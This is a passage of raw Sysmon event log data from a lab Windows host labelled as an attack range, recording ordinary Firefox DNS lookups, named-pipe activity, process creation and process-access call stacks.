ntdll.dll+51791 10341000x800000000000000042652Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.536{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042651Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.536{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042650Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.536{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042649Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.532{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko.3296.6128.5310278599138488556C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000042648Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:42.532{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko.3296.6128.5310278599138488556C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042647Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.531{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.530{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.4.43153772C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042645Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.804{FE4C2B44-E48F-63C7-3106-00000000AF02}3296prod.balrog.prod.cloudops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042644Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.804{FE4C2B44-E48F-63C7-3106-00000000AF02}3296prod.balrog.prod.cloudops.mozgcp.net035.244.181.201;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042643Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.626{FE4C2B44-E48F-63C7-3106-00000000AF02}3296r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;23.215.105.73;23.215.105.74;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042642Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.523{FE4C2B44-E48F-63C7-3106-00000000AF02}32963564C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3606-00000000AF02}1472C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000042641Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:42.523{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\gecko-crash-server-pipe.3296C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042640Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.492{FE4C2B44-E48F-63C7-3106-00000000AF02}3296prod.ingestion-edge.prod.dataops.mozgcp.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042639Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.492{FE4C2B44-E48F-63C7-3106-00000000AF02}3296prod.ingestion-edge.prod.dataops.mozgcp.net034.120.208.123;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042638Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.340{FE4C2B44-E48F-63C7-3106-00000000AF02}3296a1887.dscq.akamai.net02600:141f:4000:9::17ca:5a0e;2600:141f:4000:9::17ca:5a04;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.337{FE4C2B44-E48F-63C7-3106-00000000AF02}3296prod.content-signature-chains.prod.webservices.mozgcp.net02600:1901:0:92a9::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.337{FE4C2B44-E48F-63C7-3106-00000000AF02}3296a1887.dscq.akamai.net023.215.105.74;23.215.105.73;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.336{FE4C2B44-E48F-63C7-3106-00000000AF02}3296prod.content-signature-chains.prod.webservices.mozgcp.net034.160.144.191;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.335{FE4C2B44-E48F-63C7-3106-00000000AF02}3296r3.o.lencr.org0type: 5 o.lencr.edgesuite.net;type: 5 a1887.dscq.akamai.net;::ffff:23.215.105.73;::ffff:23.215.105.74;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.303{FE4C2B44-E48F-63C7-3106-00000000AF02}3296detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.263{FE4C2B44-E48F-63C7-3106-00000000AF02}3296example.org0::ffff:93.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.263{FE4C2B44-E48F-63C7-3106-00000000AF02}3296example.org093.184.216.34;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.221{FE4C2B44-E48F-63C7-3106-00000000AF02}3296cs9.wac.phicdn.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.221{FE4C2B44-E48F-63C7-3106-00000000AF02}3296cs9.wac.phicdn.net072.21.91.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.208{FE4C2B44-E48F-63C7-3106-00000000AF02}3296prod.detectportal.prod.cloudops.mozgcp.net02600:1901:0:38d7::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.207{FE4C2B44-E48F-63C7-3106-00000000AF02}3296prod.detectportal.prod.cloudops.mozgcp.net034.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000042626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:41.206{FE4C2B44-E48F-63C7-3106-00000000AF02}3296detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;::ffff:34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.516{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e86462|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac03d9|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1|C:\Program Files\Mozilla Firefox\xul.dll+472a2ec|C:\Program Files\Mozilla Firefox\xul.dll+472b10d|C:\Program Files\Mozilla Firefox\xul.dll+20599f2|C:\Program Files\Mozilla Firefox\firefox.exe+1e99e|C:\Program Files\Mozilla Firefox\firefox.exe+2c9f8|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000042624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.516{FE4C2B44-E48F-63C7-3106-00000000AF02}32966128C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.511{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.510{FE4C2B44-E48F-63C7-3106-00000000AF02}32963116C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.510{FE4C2B44-E492-63C7-3806-00000000AF02}3692C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3296.6.959689719\959252119" -childID 5 -isForBrowser -prefsHandle 4648 -prefMapHandle 4652 -prefsLen 31596 -prefMapSize 234522 -jsInitHandle 1112 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c92eea1-4acc-40ec-a4f0-fba71dcca3b8} 3296 "\\.\pipe\gecko-crash-server-pipe.3296" 4392 1fb46478f58 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" 10341000x800000000000000042620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.509{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.509{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.509{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.508{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.508{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042615Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.508{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042614Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.508{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042613Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.508{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042612Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.508{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla 